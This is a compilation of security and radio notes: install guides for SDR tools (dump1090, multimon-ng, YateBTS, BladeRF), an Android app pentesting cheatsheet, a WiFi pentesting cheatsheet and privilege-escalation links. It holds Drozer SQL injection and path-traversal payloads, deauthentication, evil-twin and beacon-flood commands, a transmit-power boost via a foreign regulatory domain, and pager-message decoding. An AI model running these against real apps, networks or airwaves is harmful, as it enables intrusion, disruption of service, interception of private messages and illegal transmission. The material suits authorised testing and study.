Installing dump1090 ADSB Decoder Tool on Ubuntu (16.04 LTS)

Installing dump1090 for the RTLSDR dongle

Download dump1090
Download dump1090 zip file from github:
https://github.com/antirez/dump1090

Install Prerequisites
$ sudo apt-get install librtlsdr0 librtlsdr-dev

Install dump1090
$ cd dump1090-master
$ make

Using dump1090
1. Start dump1090 in interactive mode with the plane plotting option
$ ./dump1090 --interactive --net

2. Plane details will appear in this terminal window

3. Open your browser to see the planes plotted:
http://localhost:8080

Fixing Install Errors
Note: having librtlsdr-dev installed fixes this error:

user@host:~/dump1090-master$ make
Package librtlsdr was not found in the pkg-config search path.
Perhaps you should add the directory containing `librtlsdr.pc’
to the PKG_CONFIG_PATH environment variable
No package ‘librtlsdr’ found
cc -O2 -g -Wall -W -c dump1090.c
dump1090.c:46:21: fatal error: rtl-sdr.h: No such file or directory
compilation terminated.
Makefile:9: recipe for target ‘dump1090.o’ failed
make: *** [dump1090.o] Error 1

Installing dump1090 fork for more device support (RTLSDR/HackRF/Airspy/SDRplay)

Download dump1090_sdrplus
Download dump1090_sdrplus zip file from github:
https://github.com/itemir/dump1090_sdrplus

Install Prerequisites
$ sudo apt-get install librtlsdr0 librtlsdr-dev
$ sudo apt-get install libhackrf0 libhackrf-dev
$ sudo apt-get install libairspy0 libairspy-dev
$ sudo apt-get install libsoxr0 libsoxr-dev

Next, download SDRPlay libraries from:
http://www.sdrplay.com/linuxdl.php

Install SDRPlay:
user@host:~$ chmod 755 SDRplay_RSP_MiricsAPI-1.9.4.run
user@host:~$ ./SDRplay_RSP_MiricsAPI-1.9.4.run
Verifying archive integrity… All good.
Uncompressing SDRplay Mirics API Install Package V1.9.4 100%
Installing SDRplay RSP Mirics API library…
Architecture: x86_64
API Version: 1.8.1
Remove old libraries…
[sudo] password for user:
Install /usr/local/lib/libmirsdrapi-rsp.so
Remove old header files…
Install /usr/local/include/mirsdrapi-rsp.h
Udev rules directory found, adding rules…
Libusb found, continuing…
Installing SoapySDRPlay…
Installing SoapySDR…
Finished.
$ sudo ldconfig

Install dump1090_sdrplus
$ cd dump1090_sdrplus-master
$ make

Using dump1090_sdrplus
1. Start dump1090 in interactive mode with the plane plotting option
$ ./dump1090 --interactive --net

2. Plane details will appear in this terminal window

3. Open your browser to see the planes plotted:
http://localhost:8080

Fixing Install Errors
Note: having librtlsdr-dev installed fixes this error:

user@host:~/tools/dump1090-sdrplus-master$ make
Package librtlsdr was not found in the pkg-config search path.
Perhaps you should add the directory containing `librtlsdr.pc’
to the PKG_CONFIG_PATH environment variable
No package ‘librtlsdr’ found
cc -O2 -g -Wall -W -c dump1090.c
dump1090.c:46:21: fatal error: rtl-sdr.h: No such file or directory
compilation terminated.
Makefile:9: recipe for target ‘dump1090.o’ failed
make: *** [dump1090.o] Error 1

Note: having libhackrf0 & libhackrf-dev installed fixes this error:

user@host:~/tools/dump1090_sdrplus-master$ make
Package libhackrf was not found in the pkg-config search path.
Perhaps you should add the directory containing `libhackrf.pc’
to the PKG_CONFIG_PATH environment variable
No package ‘libhackrf’ found
Package libairspy was not found in the pkg-config search path.
Perhaps you should add the directory containing `libairspy.pc’
to the PKG_CONFIG_PATH environment variable
No package ‘libairspy’ found
Package soxr was not found in the pkg-config search path.
Perhaps you should add the directory containing `soxr.pc’
to the PKG_CONFIG_PATH environment variable
No package ‘soxr’ found
cc -O2 -g -Wall -W -c dump1090.c
dump1090.c:51:30: fatal error: libhackrf/hackrf.h: No such file or directory
compilation terminated.
Makefile:9: recipe for target ‘dump1090.o’ failed
make: *** [dump1090.o] Error 1

Note: having libairspy0 & libairspy-dev installed fixes this error:

user@host:~/tools/dump1090-sdrplus-master$ make
Package libairspy was not found in the pkg-config search path.
Perhaps you should add the directory containing `libairspy.pc’
to the PKG_CONFIG_PATH environment variable
No package ‘libairspy’ found
Package soxr was not found in the pkg-config search path.
Perhaps you should add the directory containing `soxr.pc’
to the PKG_CONFIG_PATH environment variable
No package ‘soxr’ found
cc -O2 -g -Wall -W -c dump1090.c
dump1090.c:52:30: fatal error: libairspy/airspy.h: No such file or directory
compilation terminated.
Makefile:9: recipe for target ‘dump1090.o’ failed
make: *** [dump1090.o] Error 1

Note: having libsoxr0 & libsoxr-dev installed fixes this error:

user@host:~/tools/dump1090-sdrplus-master$ make
Package soxr was not found in the pkg-config search path.
Perhaps you should add the directory containing `soxr.pc’
to the PKG_CONFIG_PATH environment variable
No package ‘soxr’ found
cc -O2 -g -Wall -W -c dump1090.c
dump1090.c:53:27: fatal error: mirsdrapi-rsp.h: No such file or directory
compilation terminated.
Makefile:9: recipe for target ‘dump1090.o’ failed
make: *** [dump1090.o] Error 1

Note: having SDRPlay libraries installed fixes this error:

user@host:~/tools/dump1090-sdrplus-master$ make
cc -O2 -g -Wall -W -I/usr/include/ -I/usr/include/libusb-1.0 -I/usr/include/ -I/usr/include/libusb-1.0 -c dump1090.c
dump1090.c:53:27: fatal error: mirsdrapi-rsp.h: No such file or directory
compilation terminated.
Makefile:9: recipe for target ‘dump1090.o’ failed
make: *** [dump1090.o] Error 1

Note: running ldconfig fixes this error:

user@host:~/tools/dump1090-sdrplus-master$ make
./dump1090: error while loading shared libraries: libmirsdrapi-rsp.so: cannot open shared object file: No such file or directory

Installing multimon-ng Pager Decoder Tool on Ubuntu (16.04 LTS)

Download multimon-ng
Download multimon-ng zip file from github:
https://github.com/EliasOenal/multimon-ng

Note: Ubuntu has a “multimon” tool in the apt repos, but the GitHub version is used here.
There are many ways to pipe the data into “multimon-ng”; the PulseAudio method is used here.

Install Prerequisites
$ sudo apt-get install pavucontrol
$ sudo apt-get install libpulse-dev

Install multimon-ng
$ cd multimon-ng-master
$ mkdir build
$ cd build
$ qmake ../multimon-ng.pro
$ make
$ sudo make install

Using multimon-ng with pulseaudio
1. Start gqrx
$ gqrx
Use gqrx to tune to a pager frequency (e.g. 148 MHz region for Australia)
Set the filter width to: “Wide”
Set the filter shape to: “Normal”
Set the gqrx mode to “Narrow FM”

2. Configure pavucontrol
$ pavucontrol
Set configuration tab: “Analogue Stereo Output”

3. Use pulseaudio to pipe the audio from gqrx to multimon-ng
$ padsp multimon-ng -a POCSAG512 -a POCSAG1200 -a POCSAG2400 -f alpha

Note: set the pager demod options for your region
e.g. POCSAG for Australia

As you tune to different pager frequencies in gqrx, you will see the decoded messages appear in the multimon-ng terminal.

Fixing Install Errors
Note: having libpulse-dev installed fixes this error:

user@host:~/multimon-ng-master/build$ make
gcc -c -m64 -pipe -std=gnu99 -g -O2 -Wall -W -fPIC -DMAX_VERBOSE_LEVEL=3 -DPULSE_AUDIO -DCHARSET_UTF8 -I../../multimon-ng-master -I. -I/usr/lib/x86_64-linux-gnu/qt5/mkspecs/linux-g++-64 -o unixinput.o ../unixinput.c
../unixinput.c:45:26: fatal error: pulse/simple.h: No such file or directory
compilation terminated.
Makefile:391: recipe for target ‘unixinput.o’ failed
make: *** [unixinput.o] Error 1

Android Pentesting Command Cheatsheet

Useful tools
Android SDK
Android Studio
GenyMotion emulator
BusyBox
apktool
dex2jar
enjarify
jd-gui
MWR’s Drozer testing framework
Fino

Useful Linux file paths
android/adt-bundle-linux-ver-number/sdk/platform-tools: adb tool
android/adt-bundle-linux-ver-number/sdk/tools: emulator, android tools
~/.android/avd/<emulator-device-name>.avd/: emulator config files

Useful Windows file paths
C:\Users\username\AppData\Local\Android\sdk

Useful Android paths
/data/app: location of app on android device
/data/data/[packagename]/*: app data files
/data/dalvik-cache: Classes.dex for all installed apps

Useful configuration settings
Enable hardware keyboard in emulator:
Add: hw.keyboard=yes to the config file:
~/.android/avd/<emulator-device-name>.avd/config.ini

Install test environment
Install Android SDK only
https://developer.android.com/studio/releases/platforms.html
OR
Install Android Studio
https://developer.android.com
OR
Install GenyMotion
https://www.genymotion.com

Install APIs
$ android
and choose API version to install with gui

List available Android targets
$ android list targets

Create an Android image for a target
$ android create avd -n test -t 3
$ android create avd -n test -t 3 --abi default/x86

Start emulator
Start the emulator for the created image @test:
$ emulator @test
$ adb shell

Install BusyBox
$ adb push busybox /data/local
$ adb shell
$ su
# mount -o remount,rw -t yaffs2 /dev/block/mtdblock3 /system
# mkdir /system/xbin
# cat /data/local/busybox > /system/xbin/busybox
# chmod 755 /system/xbin/busybox
# busybox --install /system/xbin
# mount -o ro,remount -t yaffs2 /dev/block/mtdblock3 /system
# sync
# reboot

Install Burp cert on emulator
Create an sdcard for the emulator:
$ mksdcard -l pisd 1G /tmp/sdcard

Launch emulator with -sdcard option:
$ emulator-x86 -sdcard /tmp/sdcard -avd test -qemu -m 1024 -enable-kvm -http-proxy "http://192.168.1.2:8080"

Get Portswigger cert from visiting a page in browser, export and save as Portswigger.crt
Note: must have .crt extension for android to recognise it on sdcard

Copy the cert onto the device:
$ adb push Portswigger.crt /mnt/sdcard
Next, go to “Settings” and install from sdcard

Installing Drozer
Install drozer app on test device and run it.
From your laptop, connect to the app:
$ adb forward tcp:31415 tcp:31415
$ drozer console connect
$ drozer console --server 10.0.2.15:31415 connect

Copy an APK off device
Installed APKs are located in /data/app on the device
$ adb pull /data/app/AppName-1.apk .

Extracting Java code from an APK
Extract the APK using APKTool. Run: apktool d AppName.apk
Extract the classes.dex file found in the APK file. Run: jar xvf AppName.apk classes.dex
Extract the classes from classes.dex file. Run: dex2jar classes.dex
Extract the classes.dex.dex2jar.jar. Run: jar xvf classes.dex.dex2jar.jar
Browse Java code: Open the extracted jar file in jd-gui

Check the manifest file
First, unpack the apk using unzip
$ unzip AppName.apk
$ axmlprinter AndroidManifest.xml

Check package information
Using Drozer:
dz> run app.package.list
dz> run app.package.attacksurface com.targetpackage
dz> run app.provider.info -a com.targetpackage

Check for the debug flag
Using Drozer:
dz> run app.package.debuggable
OR
Check manifest file.

Check for SQL injection
Using Drozer:
dz> run scanner.provider.injection -a com.targetpackage

Check for path traversal
Using Drozer:
dz> run scanner.provider.traversal -a com.targetpackage

Check the Content Providers
Content providers provide access to structured data.
Can be affected by: SQLi, directory traversal

Useful Drozer commands for working with content providers:
dz> run app.provider.info -a com.targetpackage
dz> run app.provider.finduri com.targetpackage
dz> run scanner.provider.finduris -a com.targetpackage
dz> run scanner.provider.traversal -a com.targetpackage
dz> run scanner.provider.injection -a com.targetpackage
dz> run app.provider.query content://com.targetpackage...
dz> run app.provider.query content://com.targetpackage... --vertical --selection "'"
dz> run app.provider.query content://com.targetpackage... --projection "* FROM SQLITE_MASTER WHERE type='table';--"
dz> run app.provider.query content://com.targetpackage... --projection "* FROM Key;--"
dz> run app.provider.read content://com.targetpackage...
dz> run app.provider.read content://com.targetpackage../etc/hosts
dz> run app.provider.download content://com.targetpackage../data/data/com.targetpackage/databases/database.db

Check the Activities
Activities provide user facing components.
Can be affected by UI redressing attacks e.g. tap jacking etc

Useful Drozer commands for working with activities:
dz> run app.activity.info -a com.targetpackage
dz> run app.activity.start --component com.targetpackage com.targetpackage.ActivityName

Check the Services
Useful Drozer commands for working with services:
dz> run app.service.info -a com.targetpackage
dz> run app.service.send com.targetpackage com.targetpackage.ServiceName

Check the Intents
Intents can be implicit or explicit.
Check Manifest file for public intents, e.g.
<receiver android:name="my.special.receiver">
<intent-filter>
<action android:name="my.intent.action" />
</intent-filter>
</receiver>

Instead, receivers should set the exported flag to false or be made private, e.g.
<receiver android:name="my.special.receiver"
android:exported="false">
...
</receiver>

OR
<receiver android:name="my.special.receiver"
android:exported="false"
android:permission="my.own.permission">
...
</receiver>

Check the Broadcast Receivers
Broadcast receivers handle implicit intent messages or system wide events

Useful Drozer commands for working with broadcast receivers:
dz> run app.broadcast.info -a com.PackageName.AppName
dz> run app.broadcast.send --action [name of action from manifest file] --component com.PackageName.AppName com.PackageName.AppName.push.GCMPushReceiver
dz> run app.broadcast.send --action [name of action from manifest file] --component com.PackageName.AppName.push.GCMPushReceiver --extra string paramName paramValue --extra string paramName2 paramValue2

Check for Sticky broadcasts
<uses-permission android:name="android.permission.BROADCAST_STICKY"/>
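
The manifest checks above (debug flag, exported components with no permission, sticky broadcasts) can be run in one pass over a decoded manifest. This is an added example, not part of the original cheatsheet; it assumes the manifest has already been decoded to text (e.g. with apktool d), and the sample manifest, the audit_manifest function and the severity labels are constructed for illustration.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"
COMPONENT_TAGS = ("activity", "activity-alias", "service", "receiver", "provider")
GUARDS = ("permission", "readPermission", "writePermission")

# Constructed sample (not from a real app), in the decoded text form that `apktool d` writes.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.demo">
  <uses-permission android:name="android.permission.BROADCAST_STICKY"/>
  <application android:debuggable="true">
    <activity android:name=".MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <receiver android:name="my.special.receiver">
      <intent-filter>
        <action android:name="my.intent.action"/>
      </intent-filter>
    </receiver>
    <receiver android:name="my.private.receiver" android:exported="false"/>
    <service android:name=".SyncService" android:exported="true" android:permission="my.own.permission"/>
    <provider android:name=".NotesProvider" android:exported="true" android:authorities="com.example.demo.notes"/>
  </application>
</manifest>
"""


def attr(elem, name):
    """Return the android:<name> attribute of elem, or None if absent."""
    return elem.get(ANDROID_NS + name)


def is_launcher(elem):  # the launcher activity has to be exported to start the app
    return any(attr(c, "name") == "android.intent.category.LAUNCHER"
               for c in elem.iter("category"))


def audit_manifest(xml_text):
    """Return (severity, subject, message) findings for a decoded manifest."""
    root = ET.fromstring(xml_text)
    findings = []
    for perm in root.iter("uses-permission"):
        if attr(perm, "name") == "android.permission.BROADCAST_STICKY":
            findings.append(("info", "manifest", "requests BROADCAST_STICKY"))
    for app in root.iter("application"):
        if attr(app, "debuggable") == "true":
            findings.append(("high", "application", "android:debuggable is true"))
        for comp in app:
            if comp.tag not in COMPONENT_TAGS or is_launcher(comp):
                continue
            exported = attr(comp, "exported")
            # Before Android 12, an intent-filter with no android:exported meant exported.
            implicit = exported is None and comp.find("intent-filter") is not None
            if not (implicit or exported == "true"):
                continue
            if not any(attr(comp, guard) for guard in GUARDS):
                how = "implicitly" if implicit else "explicitly"
                findings.append(("medium", f"{comp.tag} {attr(comp, 'name')}",
                                 f"{how} exported with no permission"))
    return findings


if __name__ == "__main__":
    for finding in audit_manifest(SAMPLE_MANIFEST):
        print("[%s] %s: %s" % finding)
```

To audit a real app, pass the text of the AndroidManifest.xml from the apktool output directory to audit_manifest.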

Check the files stored on the device
Grep for:
http, https, ://, user, pass, hmac, login

Check for insecure data storage on the device
Perform a search for files relating to package name:
root@android:/ # find / -name com.PackageName -print

Check the SD Card:
/mnt/sdcard
/mnt/sdcard/Android/data/com.PackageName

Check the data directory:
/data/data/com.PackageName

Check the database files on the device:
sqlite> select * from StoredProperties;
429482317|OPEN_SESAME|pTpkKAqfa9ly2oLqmivPIMKZDhTVlPOMLC9Ogi3c8Z0fkXL+H8u66ytJ0aFh+QY4N4rX9Iq5qVuKnCon0a+lirekLJD3/6uoh/e5vaNptxI=

Save the database files off the device:
/data/data/packagename
cp name.db /mnt/sdcard
$ adb pull /mnt/sdcard/name.db . (otherwise won’t have perms to copy)

Check the log files:
logcat -b events
/data/anr
/data/dontpanic
/data/tombstones
dmesg

Check the device memory
Check memory stats:
$ adb shell dumpsys meminfo > mem.txt
$ adb shell dumpsys meminfo 'com.PackageName'

Dump the memory:
$ adb shell dumpsys > mem.txt
$ adb shell dumpstate > mem.txt (can show params passed to intents etc.)

Checking memory and logcat together:
$ adb shell bugreport > bugreport.txt

Check for bad code patterns
http://domain.com/api/save.php?t=" + paramString1 + "&u=" + paramString2);
reflection
etc.

Check for WebViews
Search the decompiled folder for:

addJavascriptInterface
grep -r -n -i --include=*.java addJavascriptInterface *
grep -r -i --include=*.java \@JavascriptInterface *

shouldOverrideUrlLoading
grep -r -n -i --include=*.java shouldOverrideUrlLoading *

Use Drozer module:
run ex.scanner.jsifenum -a com.targetpackage

Check the transport security
Use the emulator to dump traffic to a pcap file with the option:
-tcpdump

Use the emulator to proxy traffic with the option:
-http-proxy

Intercept with burp.

Wifi Pentesting Command Cheatsheet

Find out which modes your card supports
airmon-ng (find phy#)
iw phy phy1 info | grep -A8 modes (grep 8 lines past “modes”)

Setting a MAC Address
ifconfig wlan3 down
ifconfig wlan3 hw ether c0:ff:ee:c0:ff:ee
ifconfig wlan3 up
OR
macchanger -r wlan3 (provides a random address every time)

Monitor Mode
ifconfig wlan3 up
airmon-ng start wlan3

Looking for SSIDs
iw dev wlan3 scan passive | grep SSID

Looking at client traffic to an AP
wireshark filter: wlan.addr==CC:00:FF:EE:EE:EE and not wlan.fc.subtype == 0x08 (MAC of AP & filter out beacon frames)
wlan.addr ==CC:00:FF:EE:EE:EE and wlan.addr == DD:EE:AA:DD:BE:EF (filter on 2 client MAC addresses)

Looking for vendors
airodump-ng --manufacturer (newer versions of airodump support this)

Setting the Channel
ifconfig wlan3 down
iwconfig wlan3 channel 1 (get channel id of ssid from airodump)
iwconfig mon0 channel 1
then verify the “Frequency” value in iwconfig e.g. channel 1 = 2.412 GHz

Connecting to an Open AP
iwconfig wlan3 channel 1
iwconfig wlan3 mode managed
iwconfig wlan3 essid APName

De-authentication
iwconfig mon0 channel 1
aireplay-ng -0 10 -a CC:00:FF:EE:EE:EE -c DD:EE:AA:DD:BE:EF mon0
deauth -a access point -c client
OR
broadcast deauth packets on behalf of BSSID 11:22:33:44:55:66 to deauth all clients
iwconfig mon0 channel 1
aireplay-ng --deauth 0 -a 11:22:33:44:55:66 mon0
OR
airodump-ng --output-format csv --write /root/dump.csv mon0
airdrop-ng -i mon0 -t /root/dump.csv-01.csv -r /root/droprules

Setting up an AP
bring up AP with same name as target (put on same channel as AP)
iwconfig wlan0 channel 1
iwconfig mon0 channel 1

use same BSSID as target AP & create AP on channel 1 (unless have 2 alfa cards, 1 for deauth and 1 for AP, need to use same channel as AP)
airbase-ng -a 11:22:33:44:55:66 -e APName mon0

setup deauth attack at same time
aireplay-ng --deauth 0 -a 11:22:33:44:55:66 mon0

Auditing EAP/PEAP Enterprise
crEAP
EAPeak

requires scapy-com:
apt-get remove python-scapy
hg clone https://bitbucket.org/secdev/scapy-com
cd scapy-com && python setup.py install

Using crEAP
python crEAP.py

Using EAPeak
eapeak -i wlan3 -s APName -l

Flooding beacon frames with fake ssid
mdk3 mon0 b -n newSSIDname

where:
b=beaconflood, -n=ssid name
floods all the channels with new SSID name

Increasing power of wifi card
e.g. for broadcasting beacons from outside, set to 1 W (30 dBm)
iw reg set BO
iwconfig wlan0 txpower 30
OR
ifconfig wlan0 down
iw reg set BO
ifconfig wlan0 up
iwconfig wlan0 channel 13
iwconfig wlan0 txpower 30

Tools for visualising
Airgraph

Useful subtype hex values
0x04 : probe requests
0x05 : probe responses
0x08 : beacon frame

Units
txpower is in dBm
dBm to Watt conversions

dBm   Watts      dBm   Watts      dBm   Watts
0     1.0 mW     16    40 mW      32    1.6 W
1     1.3 mW     17    50 mW      33    2.0 W
2     1.6 mW     18    63 mW      34    2.5 W
3     2.0 mW     19    79 mW      35    3.2 W
4     2.5 mW     20    100 mW     36    4.0 W
5     3.2 mW     21    126 mW     37    5.0 W
6     4 mW       22    158 mW     38    6.3 W
7     5 mW       23    200 mW     39    8.0 W
8     6 mW       24    250 mW     40    10 W
9     8 mW       25    316 mW     41    13 W
10    10 mW      26    398 mW     42    16 W
11    13 mW      27    500 mW     43    20 W
12    16 mW      28    630 mW     44    25 W
13    20 mW      29    800 mW     45    32 W
14    25 mW      30    1.0 W      46    40 W
15    32 mW      31    1.3 W      47    50 W

ref: http://www.cpcstech.com/dbm-to-watt-conversion-information.htm

Privilege Escalation References

Linux Priv Esc
http://www.thepentesters.net/tutorials/tricks-escaping-linux-restricted-environments/
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
https://github.com/pentestmonkey/unix-privesc-check
http://www.dankalia.com/tutor/01005/0100501004.htm
http://www.softpanorama.org/Tools/Find/finding_world_writable_abandoned_and_other_abnormal_files.shtml
https://github.com/mubix/post-exploitation/wiki/Linux-Post-Exploitation-Command-List

Windows Priv Esc
https://www.insomniasec.com/downloads/publications/WindowsPrivEsc.ppt
http://toshellandback.com/2015/11/24/ms-priv-esc/
http://www.toshellandback.com/2015/08/30/gpp/
http://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679
http://www.fuzzysecurity.com/tutorials/16.html

Installing YateBTS on a Clean Ubuntu Install (16.04 LTS)

Install Prerequisites
$ sudo apt-get install subversion
$ sudo apt-get install autoconf
$ sudo apt-get install libgsm1-dev
$ sudo apt-get install libgusb-dev
$ mkdir ~/tools

Install Yate
$ which -a yate-config (make sure only have 1 instance installed)
$ cd ~/tools
$ svn checkout http://voip.null.ro/svn/yate/trunk yate
$ cd yate
$ ./autogen.sh
$ ./configure
$ sudo make install-noapi

Install YateBTS
$ cd ~/tools
$ svn checkout http://voip.null.ro/svn/yatebts/trunk yatebts
$ cd yatebts
$ ./autogen.sh
$ ./configure
$ sudo make install

Configure your username permissions for running YateBTS
$ sudo addgroup yate
$ sudo usermod -a -G yate [your-username] (-a appends; without it the user is removed from all their other groups)
$ sudo touch /usr/local/etc/yate/snmp_data.conf /usr/local/etc/yate/tmsidata.conf
$ sudo chown root:yate /usr/local/etc/yate/*.conf
$ sudo chmod g+w /usr/local/etc/yate/*.conf

Configure YateBTS values
$ sudo vim /usr/local/etc/yate/ybts.conf
Radio.Band= 900 (set your country's value here)
Radio.C0=0 (determined by your band)
Identity.MCC=001 (uncomment)

$ sudo vim /etc/security/limits.conf (increase yate’s priority value, append these lines)
@yate hard nice -20
@yate hard rtprio 99

$ sudo vim /usr/local/etc/yate/ybts.conf
radio_read_priority=highest (uncomment and change to highest)
radio_send_priority=high (uncomment and change to high)

$ sudo vim /usr/local/etc/yate/ysnmpagent.conf (change SNMP port numbers so normal users can use them)
port=20161 (uncomment and change value)
remote_port=20162 (uncomment and change value)

$ sudo vim /usr/local/etc/yate/subscribers.conf (set country code)
country_code=61 (e.g. for Australia)

Start and test YateBTS
$ yate
$ telnet localhost 5038
nib list registered (list registered devices)
nib list rejected (list rejected devices)

  • Try and connect to the “101” 2G network on your two test devices
  • Take your two test IMSI numbers from nib list rejected and add regexp= to /usr/local/etc/yate/subscribers.conf
  • Now you can make calls to each other with your allocated phone numbers (you will receive an sms when you join the network) or text ELIZA questions on 35492

Installing a BladeRF on a Clean Ubuntu Install (16.04 LTS)

Installing a BladeRF
$ sudo add-apt-repository ppa:bladerf/bladerf
$ sudo apt-get update (you may get some 404s but it’s ok)
$ sudo apt-get install bladerf
$ sudo apt-get install libbladerf-dev
$ sudo apt-get install bladerf-firmware-fx3
$ sudo apt-get install bladerf-fpga-hostedx40 (for the 40 kLE hardware)
OR 
$ sudo apt-get install bladerf-fpga-hostedx115 (for the 115 kLE hardware)

Plug in the BladeRF
$ bladeRF-cli --flash-firmware /usr/share/Nuand/bladeRF/bladeRF_fw.img

Unplug the BladeRF and plug it back in again
$ bladeRF-cli -p
Backend: libusb
Serial: d6cbcb056cc2aa1e37d14c41f15fe3af
USB Bus: 4
USB Address: 3

$ bladeRF-cli -i
bladeRF> version
bladeRF-cli version: 1.3.1-0.2016.01~rc1-3
libbladeRF version: 1.5.1-0.2016.01~rc1-3
Firmware version: 1.9.0
FPGA version: 0.5.0